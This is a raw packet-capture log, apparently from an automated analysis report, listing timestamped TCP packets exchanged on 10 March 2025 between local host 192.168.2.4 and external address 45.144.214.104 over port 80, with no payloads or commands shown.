Mar 10, 2025 09:03:16.583703041 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.583714962 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.583724976 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.583730936 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.583738089 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.583760023 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.583839893 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.618577003 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.618598938 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.618612051 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.618623972 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.618643999 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.618657112 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.618670940 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.618683100 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.618697882 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.618710041 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.618722916 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.618725061 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.618725061 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.618736029 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.618745089 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.618748903 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.618763924 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.618782043 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.618782043 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.618865013 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.618876934 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.618889093 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.618901968 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.618930101 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.618930101 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.618963957 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.619127989 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.619139910 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.619151115 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.619163036 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.619173050 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.619184017 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.619195938 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.619199038 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.619199038 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.619209051 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.619223118 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.619251966 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.619251966 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.619618893 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.619632006 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.619643927 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.619656086 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.619667053 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.619690895 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.619690895 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.619735003 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.620138884 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.620152950 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.620163918 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.620173931 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.620186090 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.620197058 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.620248079 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.620248079 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.620273113 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.620284081 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.620295048 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.620313883 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.620325089 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.620337963 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.620347977 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.620362997 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.620362997 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.620400906 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.620412111 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.620423079 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.620434046 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.620434046 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.620467901 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.621243954 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.621254921 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.621273041 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.621284008 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.621295929 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.621308088 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.621323109 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.621328115 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.621328115 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.621373892 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.621391058 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.621402025 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.621412992 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.621426105 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.621432066 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.621443033 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.621445894 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.621445894 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.621454000 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.621465921 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.621476889 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.621501923 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.621501923 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.621645927 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.622495890 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.622508049 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.622519016 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.622530937 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.622544050 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.622554064 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.622565985 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.622575998 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.622575998 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.622586012 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.622596979 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.622607946 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.622613907 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.622618914 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.622626066 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.622632027 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.622637987 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.622643948 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.622647047 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.622805119 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.622839928 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.622859001 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.622869968 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.622870922 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.622879982 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.622884035 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.622893095 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.622904062 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.622915030 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.622927904 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.622929096 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.622936010 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.622937918 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.622942924 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.622947931 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.622956991 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.622956991 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.622958899 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.622970104 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.622981071 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.622992992 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.623049974 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.623049974 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.653503895 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.653547049 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.653558016 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.653568029 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.653568029 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.653625011 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.678550005 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.678561926 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.678571939 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.678599119 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.678621054 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.678678989 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.678689003 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.678699017 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.678711891 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.678746939 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.678746939 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.678930998 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.678940058 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.678949118 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.678958893 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.678967953 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.678972960 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.678978920 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.678991079 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.679023981 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.679056883 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.679270029 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.679279089 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.679393053 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.713711023 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.713737011 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.713766098 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.713804960 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.713816881 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.713840008 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.713910103 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.713923931 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.713994026 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.714004993 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.714056015 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.714093924 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.714107990 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.714118958 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.714131117 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.714148045 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.714221954 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.714313030 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.714322090 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.714332104 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.714343071 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.714353085 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.714354992 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.714364052 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.714375019 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.714375019 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.714386940 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.714413881 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.714497089 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.714658976 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.714677095 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.714729071 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.714797974 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.714811087 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.714821100 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.714833021 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.714849949 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.714864016 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.714874983 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.714875937 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.714885950 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.714898109 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.714910984 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.714946032 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.715034008 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.715298891 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.715475082 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.715486050 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.715496063 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.715507030 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.715514898 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.715514898 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.715517998 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.715529919 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.715539932 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.715552092 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.715564013 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.715564966 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.715564966 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.715574026 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.715591908 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.715603113 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.715636015 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.715636015 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.716089964 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.716106892 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.716113091 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.716120005 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.716125011 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.716181993 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.716351032 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.716362953 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.716373920 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.716386080 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.716413021 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.716413021 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.716494083 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.716506004 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.716517925 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.716526985 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.716528893 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.716532946 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.716536045 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.716547012 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.716558933 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.716568947 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.716579914 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.716579914 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.716581106 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.716593027 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.716634035 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.716634035 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.717478991 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.717489958 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.717500925 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.717510939 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.717523098 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.717524052 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.717533112 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.717544079 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.717554092 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.717555046 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.717566013 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.717576981 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.717587948 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.717592001 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.717592001 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.717600107 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.717609882 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.717612982 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.717621088 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.717633009 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.717643976 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.717658043 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.717672110 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.717672110 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.717904091 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.718430996 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.718442917 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.718455076 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.718465090 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.718475103 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.718480110 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.718482018 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.718492985 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.718503952 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.718513966 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.718527079 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.718537092 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.718537092 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.718537092 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.718549013 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.718560934 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.718571901 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.718574047 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.718574047 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.718584061 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.718595982 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.718616009 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.718616009 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.719254971 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.719269991 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.719280005 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.719291925 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.719302893 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.719310999 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.719310999 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.719366074 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.730928898 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.774180889 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.774207115 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.774218082 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.774310112 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.774327993 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.774341106 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.774439096 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.774452925 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.774466038 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.774471045 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.774522066 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.774522066 CET	49712	80	192.168.2.4	45.144.214.104
Mar 10, 2025 09:03:16.774595022 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.774610043 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.774619102 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.774624109 CET	80	49712	45.144.214.104	192.168.2.4
Mar 10, 2025 09:03:16.774750948 CET	49712	80	192.168.2.4	45.144.214.104
